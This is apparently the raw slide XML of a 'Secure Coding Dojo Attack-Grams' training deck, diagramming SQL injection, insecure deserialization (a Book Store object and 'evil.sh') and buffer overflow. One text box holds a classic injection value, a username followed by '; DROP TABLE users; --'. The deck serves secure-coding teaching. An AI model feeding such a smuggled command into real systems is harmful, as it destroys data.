        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1">
            <a:alphaModFix amt="53000"/>
          </a:blip>
          <a:srcRect l="80808" t="32963" r="2090" b="37635"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1123560" y="1898280"/>
            <a:ext cx="1369440" cy="1664280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="404" name="Group 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1329120" y="4404960"/>
            <a:ext cx="1048320" cy="1548360"/>
            <a:chOff x="1329120" y="4404960"/>
            <a:chExt cx="1048320" cy="1548360"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="405" name="Graphic 5" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1339200" y="4404960"/>
              <a:ext cx="950400" cy="95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06" name="TextBox 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1329120" y="5315040"/>
              <a:ext cx="104832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407" name="Curved Connector 10"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="405" idx="0"/>
            <a:endCxn id="403" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1" rot="16200000">
            <a:off x="1389960" y="3980520"/>
            <a:ext cx="842760" cy="6480"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="c00000">
                <a:alpha val="56000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="408" name="TextBox 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1618920" y="3928680"/>
            <a:ext cx="3827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user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: jsmith</a:t>
            </a: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'; DROP TABLE users;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>--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Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1196640" y="1582560"/>
            <a:ext cx="1118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Program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Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5062680" y="1701000"/>
            <a:ext cx="2424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SQL Database Server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11" name="Curved Connector 17"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2379240" y="2623680"/>
            <a:ext cx="3395520" cy="15120"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25013"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="000000">
                <a:alpha val="56000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="412" name="Can 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5772600" y="2130840"/>
            <a:ext cx="1133280" cy="1194840"/>
          </a:xfrm>
          <a:prstGeom prst="can">
            <a:avLst>
              <a:gd name="adj" fmla="val 25000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:alpha val="18000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="325490">
                <a:alpha val="2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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="413" name="Curved Connector 24"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2379240" y="2949480"/>
            <a:ext cx="3395520" cy="23040"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25013"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="c00000">
                <a:alpha val="56000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="414" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3369240" y="2729160"/>
            <a:ext cx="1525320" cy="25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100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="c00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>DROP TABLE users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5" name="Picture 26" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect l="82197" t="2808" r="2087" b="69373"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6084000" y="2427840"/>
            <a:ext cx="514080" cy="643320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="416" name="TextBox 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5959440" y="3003120"/>
            <a:ext cx="763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users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17" name="Group 27"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6145920" y="2644920"/>
            <a:ext cx="358920" cy="327240"/>
            <a:chOff x="6145920" y="2644920"/>
            <a:chExt cx="358920" cy="327240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="418" name="Straight Connector 16"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6145920" y="2644920"/>
              <a:ext cx="359280" cy="327600"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="25400">
              <a:solidFill>
                <a:srgbClr val="ff0000"/>
              </a:solidFill>
              <a:round/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="419" name="Straight Connector 31"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="6145920" y="2644920"/>
              <a:ext cx="359280" cy="327600"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="25400">
              <a:solidFill>
                <a:srgbClr val="ff0000"/>
              </a:solidFill>
              <a:round/>
            </a:ln>
          </p:spPr>
        </p:cxn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9" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3785760" y="2090880"/>
            <a:ext cx="1575720" cy="1249200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="102" name="Picture 3" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1307160" y="697680"/>
            <a:ext cx="1211760" cy="1137240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="103" name="Picture 4" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2781720" y="692640"/>
            <a:ext cx="1692360" cy="1147680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="104" name="Picture 5" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4736160" y="692640"/>
            <a:ext cx="1652040" cy="1181160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="105" name="Picture 6" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6803280" y="698760"/>
            <a:ext cx="1907280" cy="1320480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="106" name="Picture 7" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9126000" y="696600"/>
            <a:ext cx="1805040" cy="1312920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="107" name="Picture 8" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1192320" y="2090880"/>
            <a:ext cx="2249280" cy="1350000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="108" name="Picture 10" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5736240" y="2090880"/>
            <a:ext cx="1745640" cy="1245600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="109" name="Picture 11" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7738920" y="2125800"/>
            <a:ext cx="1581480" cy="1467360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="110" name="Picture 12" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9720360" y="2090880"/>
            <a:ext cx="1174320" cy="1087920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="111" name="Picture 13" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1576440" y="3556440"/>
            <a:ext cx="1388160" cy="1348560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="112" name="Picture 14" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId12"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3503160" y="3579480"/>
            <a:ext cx="1488960" cy="1253160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="113" name="Picture 15" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId13"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5430600" y="3576600"/>
            <a:ext cx="1377360" cy="1307880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="114" name="Picture 16" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId14"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7243560" y="3593520"/>
            <a:ext cx="1388160" cy="1326960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="115" name="Picture 17" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId15"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9061560" y="3600720"/>
            <a:ext cx="1187640" cy="1319760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="116" name="Picture 18" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId16"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1476000" y="5137200"/>
            <a:ext cx="1409040" cy="1231560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="117" name="Picture 19" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId17"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3421080" y="5071680"/>
            <a:ext cx="1438200" cy="1172880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="118" name="Picture 20" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId18"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7468920" y="5084280"/>
            <a:ext cx="1087200" cy="894960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="119" name="Picture 21" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId19"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9068040" y="5075640"/>
            <a:ext cx="1513080" cy="869040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="120" name="Rectangle 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12189960" cy="450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Calibri"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>Secure Coding Dojo Attack-Grams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1" name="Picture 24" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId20"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5442840" y="5071680"/>
            <a:ext cx="1303920" cy="1215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699120" y="284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Insecure Deserialization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1" name="Picture 3" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1">
            <a:alphaModFix amt="53000"/>
          </a:blip>
          <a:srcRect l="80808" t="32963" r="2090" b="37635"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2723760" y="1567440"/>
            <a:ext cx="1369440" cy="1664280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="422" name="Group 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2037600" y="4613760"/>
            <a:ext cx="1048320" cy="1548720"/>
            <a:chOff x="2037600" y="4613760"/>
            <a:chExt cx="1048320" cy="1548720"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="423" name="Graphic 5" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2048040" y="4613760"/>
              <a:ext cx="950400" cy="95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24" name="TextBox 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2037600" y="5524200"/>
              <a:ext cx="104832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425" name="Curved Connector 10"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="423" idx="0"/>
            <a:endCxn id="421" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1" rot="5400000">
            <a:off x="2274480" y="3480120"/>
            <a:ext cx="1382400" cy="885600"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 24980"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="c00000">
                <a:alpha val="56000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="426" name="Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2732760" y="1240200"/>
            <a:ext cx="1351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Book Store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7" name="Graphic 53" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3088080" y="2468520"/>
            <a:ext cx="479520" cy="492480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="428" name="Rectangle 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9462240" y="2971440"/>
            <a:ext cx="1563480" cy="2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ffffff"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>&gt;_ evil.sh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9" name="Graphic 63" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1506600" y="3782520"/>
            <a:ext cx="572760" cy="572760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="430" name="Group 23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3792600" y="4389480"/>
            <a:ext cx="1683720" cy="1498680"/>
            <a:chOff x="3792600" y="4389480"/>
            <a:chExt cx="1683720" cy="1498680"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="431" name="Graphic 24" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="3902400" y="4389480"/>
              <a:ext cx="950400" cy="950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32" name="Graphic 25" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId6"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4237920" y="4573080"/>
              <a:ext cx="950400" cy="95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33" name="TextBox 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3792600" y="5524200"/>
              <a:ext cx="16837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Regular Users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34" name="TextBox 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1305360" y="4389480"/>
            <a:ext cx="12999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Command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Object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35" name="Curved Connector 31"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="431" idx="0"/>
            <a:endCxn id="421" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1" rot="16200000">
            <a:off x="3314160" y="3326040"/>
            <a:ext cx="1158120" cy="969480"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="595959">
                <a:alpha val="56000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="436" name="Graphic 32" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4754160" y="3549960"/>
            <a:ext cx="870840" cy="870840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="437" name="TextBox 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4907520" y="4323240"/>
            <a:ext cx="8791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Book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Object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1261440" y="4172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Buffer Overflow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9" name="Picture 3" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1">
            <a:alphaModFix amt="53000"/>
          </a:blip>
          <a:srcRect l="80808" t="32963" r="2090" b="37635"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3672720" y="1894320"/>
            <a:ext cx="2024640" cy="2459880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="440" name="Group 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1329120" y="2649240"/>
            <a:ext cx="1048320" cy="1548360"/>
            <a:chOff x="1329120" y="2649240"/>
            <a:chExt cx="1048320" cy="1548360"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="441" name="Graphic 5" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1339200" y="2649240"/>
              <a:ext cx="950400" cy="95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42" name="TextBox 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1329120" y="3559320"/>
              <a:ext cx="104832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443" name="Curved Connector 10"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="441" idx="3"/>
            <a:endCxn id="439" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2289600" y="3124080"/>
            <a:ext cx="1383480" cy="720"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25013"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="c00000">
                <a:alpha val="56000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:round/>
